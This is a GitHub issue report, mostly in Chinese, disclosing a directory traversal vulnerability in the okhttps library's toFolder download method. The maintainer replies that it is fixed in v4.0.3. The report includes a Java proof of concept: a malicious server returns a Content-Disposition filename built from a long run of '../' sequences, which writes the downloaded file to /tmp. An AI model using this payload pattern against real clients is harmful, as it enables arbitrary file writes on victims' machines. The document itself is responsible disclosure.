使用toFolder方法下载文件时可能出现目录穿越漏洞
Closed this issue · 2 comments
arandomusernone commented
问题描述
使用toFolder
方法下载文件到某个目录时,根据服务端返回的Content-Disposition 获取文件名会出现目录穿越漏洞。如果服务端返回的filename包含
../`,文件就会被保存到其他路径下。
When using the toFolder method to download file to a certain directory, a directory traversal vulnerability will occur when obtaining the file name based on the Content-Disposition returned by the server. If the filename returned by the server contains
../`, directory traversal will occur.
复现过程
Client:
HTTP exp = HTTP.builder()
.baseUrl("http://127.0.0.1:8080")
.build();
exp.sync("/a.zip")
.get().getBody()
.toFolder("/Users/e4stjun/Desktop/test")
.start();
Server:
@RestController
public class ExpController {
@RequestMapping("/a.zip")
public String a(HttpServletResponse response)
{
response.setHeader("Content-Disposition","attachment;filename=../../../../../../../../../../../../../../../../../../../../../../tmp/success");
return "success";
}
}
使用的版本
- okhttps 4.0.2
- JDK20
troyzhxu commented
收到,下个版本修复。
troyzhxu commented
已在 v4.0.3
中修复:https://github.com/troyzhxu/okhttps/releases/tag/v4.0.3